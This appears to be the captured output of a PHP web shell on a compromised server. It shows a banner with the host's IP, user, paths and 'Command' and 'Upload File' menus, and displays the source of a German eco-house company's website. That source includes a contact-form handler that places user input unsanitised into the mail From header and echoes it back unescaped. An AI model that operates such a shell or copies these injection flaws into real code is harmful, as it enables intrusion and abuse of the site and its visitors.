gzuncompress
|
Server IP : 172.19.0.3 / Your IP : 216.73.216.178 Web Server : Apache/2.4 System : Linux 880f91b28fd7 5.15.0-117-generic #127~20.04.1-Ubuntu SMP Thu Jul 11 15:36:12 UTC 2024 x86_64 User : tomlinde ( 155017) PHP Version : 5.6.40 Disable Function : dl, syslog, opcache_get_status MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home/webpages/lima-city/tomlinde/html/vikee/../Arbeit/oekohausbaucom/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
<?php
session_start();
//header('Content-type: text/xml');//missing charset
echo '<?xml version="1.0" encoding="UTF-8"?>';
?>
<!DOCTYPE html>
<html>
<head>
<title>Öko Niedrigenergiehäuser mit Erdkühlung
Sparpreise durch Selbstbaumodule</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="copyright" content="http://oekohausbau.com" />
<meta name="author" content="http://oekohausbau.com"/>
<meta name="publisher" content="http://oekohausbau.com"/>
<meta name="page-topic" content="http://oekohausbau.com"/>
<meta name="audience" content="All"/>
<meta name="keywords" content="haus,häuser,haus bauen,bio häuser,oeko haus, ökohäuser bauen"/>
<meta name="description" content=" - Ich -"/>
<meta name="date" content="2015-06-28"/>
<meta http-equiv="content-language" content="de"/>
<meta name="robots" content="index,follow"/>
<meta name="revisit-after" content="10 days"/>
<meta name=viewport content="width=device-width, initial-scale=1">
<link rel="alternate" href="" hreflang="de" />
<link rel="shortcut icon" type="images/x-icon" href="img/favicon.ico" />
<link rel="stylesheet" type="text/css" href="style.css"/>
<link rel="stylesheet" type="text/css" href="style-mobile.css">
<link rel="stylesheet" href="Slider/css/example.css">
<link rel="stylesheet" href="Slider/css/font-awesome.min.css">
<script src="lightbox/js/jquery-1.11.0.min.js"></script>
<script src="lightbox/js/lightbox.min.js"></script>
<link href="lightbox/css/lightbox.css" rel="stylesheet" />
</head>
<body>
<div id="fb-root"></div>
<script>(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/de_DE/sdk.js#xfbml=1&version=v2.3";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<nav class="desktop">
<ul>
<li class = "cat1">
<a href="index.php/#1AA">Home</a>
</li>
<li class = "cat2">
<a href="#">Über uns</a>
<ul>
<li><a href="index.php/#ueberuns">Unser Team</a></li>
<li><a href="index.php/#2cat2">Vorteile</a></li>
<li><a href="index.php/#video">Unsere Videos</a></li>
</ul>
</li>
<li class = "cat3">
<a href="#">Leistungen</a>
<ul>
<li><a href="index.php/#1cat3">Bautechnik</a></li>
<li><a href="index.php/#1cat3">Standartbauweise</a></li>
<li><a href="index.php/#selbstbaumodule">Selbstbaumodule</a></li>
<li><a href="index.php/#erdbebensicher">Sturm- und Erdbebensicher bauen</a></li>
<li><a href="index.php/#erdkuehlung">Erdkühlung</a></li>
</ul>
</li>
<li class = "cat4">
<a href="#">Preise</a>
<ul>
<li><a href="index.php/#preise">Preise Thailand</a></li>
<li><a href="index.php/#3cat4">Testverfahren</a></li>
</ul>
</li>
<li class = "cat5">
<a href="#">Kontakt</a>
<ul>
<li><a href="index.php/#1B">Kontaktformular</a></li>
<li><a href="index.php/#2B">Impressum</a></li>
<li><a href="index.php/#3B">Links</a></li>
</ul>
</li>
<div class="fb-like" data-href="http://oekohausbau.com" data-width="80px" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true">
</div>
</ul>
</nav>
<nav class="mobilmenu">
<ul>
<li><a id="current"><img src="img/menueiconTL01.png"/></a>
<ul>
<li><a href="index.php/#1AA"> Startseite </a></li>
<li><a href="index.php/#ueberuns">Unser Team</a></li>
<li><a href="index.php/#2cat2">Vorteile</a></li>
<li><a href="index.php/#1cat3">Bautechnik</a></li>
<li><a href="index.php/#preise">Preise Thailand</a></li>
<li><a href="index.php/#1B">Kontaktformular</a></li>
<li><a href="index.php/#2B">Impressum</a></li>
<li><a href="index.php/#3B">Links</a></li>
</ul>
</li>
</ul>
</nav>
<?php
$Empfaenger = "info@oekohausbau.com";
if($_POST['submit'])
{
if(empty($_POST['name'])
|| empty($_POST['emmail'])
|| empty($_POST['tel'])
|| empty($_POST['text'])
|| ! empty($_POST['email'])
|| ! empty($_POST['captcha'])
//|| ($_POST['captcha'] != $_SESSION['captcha-wert'])
)
{
echo"Bitte gehen Sie <a href=\"javascript:history.back();\">zurück</a> und füllen Sie alle Felder aus";
}
else
{
$Mailnachricht="Sie haben eine Anfrage über ihr Kontaktformular erhalten: Firma Ladda Moser Oekohausbau DE :<br/>\n\n";
while(list($Formularfeld, $Wert)=each($_POST))
{
if($Formularfeld!="submit")
{
$Mailnachricht .= $Formularfeld.": ".$Wert."\n";
}
}
$Mailnachricht .= "\nDatum/Zeit: ".date("d.m.Y H:i:s");
$Mailbetreff = "Oekohausbau Kontaktformular DE:".$_POST['Betreff'];
$headers = "From: ".$_POST['emmail']."\n";
$headers .= "Mime-Version: 1.0\nContent-Type: text/plain; charset=utf-8\nContent-Transfer-Encoding: quoted-printable";
mail($Empfaenger, $Mailbetreff, $Mailnachricht, $headers);
echo "Sie haben folgende E-Mail an Firma Ladda Moser versandt: <br/>\n".nl2br($Mailnachricht);
}
}
else
{
echo"Oops! Ein Fehler ist aufgetreten. Bitte gehen Sie auf diese <a href=\"index.php?page=kontakt\">Seite</a>.";
}
?>
</body>
</html>